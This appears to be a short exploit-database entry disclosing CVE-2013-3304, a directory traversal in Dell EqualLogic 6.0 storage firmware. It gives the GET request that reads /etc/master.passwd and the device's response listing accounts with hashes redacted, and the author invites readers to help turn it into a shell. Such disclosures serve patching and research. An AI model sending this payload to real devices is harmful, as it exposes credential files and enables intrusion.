# Exploit Title: Remote Directory Traversal exploit for Dell EqualLogic 6.0 Storage # Date: 09/2013 # Exploit Author: Mauricio Pampim Corr�a # Vendor Homepage: www.dell.com # Version: 6.0 # Tested on: Equipment Model Dell EqualLogic PS4000 # CVE : CVE-2013-3304 The malicious user sends GET //../../../../../../../../etc/master.passwd And the Dell Storage answers root:[hash] &:/root:/bin/sh daemon:*:[hash]::0:0:The devil himself:/:/sbin/nologin operator:*:[hash]::0:0:System &:/usr/guest/operator:/sbin/nologin bin:*:[hash]::0:0:Binaries Commands and Source:/:/sbin/nologin sshd:*:[hash]:0:0:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin uucp:*:[hash]:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin grpadmin:[hash]:Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli authgroup:[hash]:Group Authenication Account:/:/sbin/nologin More informations in (Br-Portuguese) https://www.xlabs.com.br/blog/?p=50 Could obtain shell with flaw? send me an email telling me how, to mauricio[at]xlabs.com.br Thanks
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论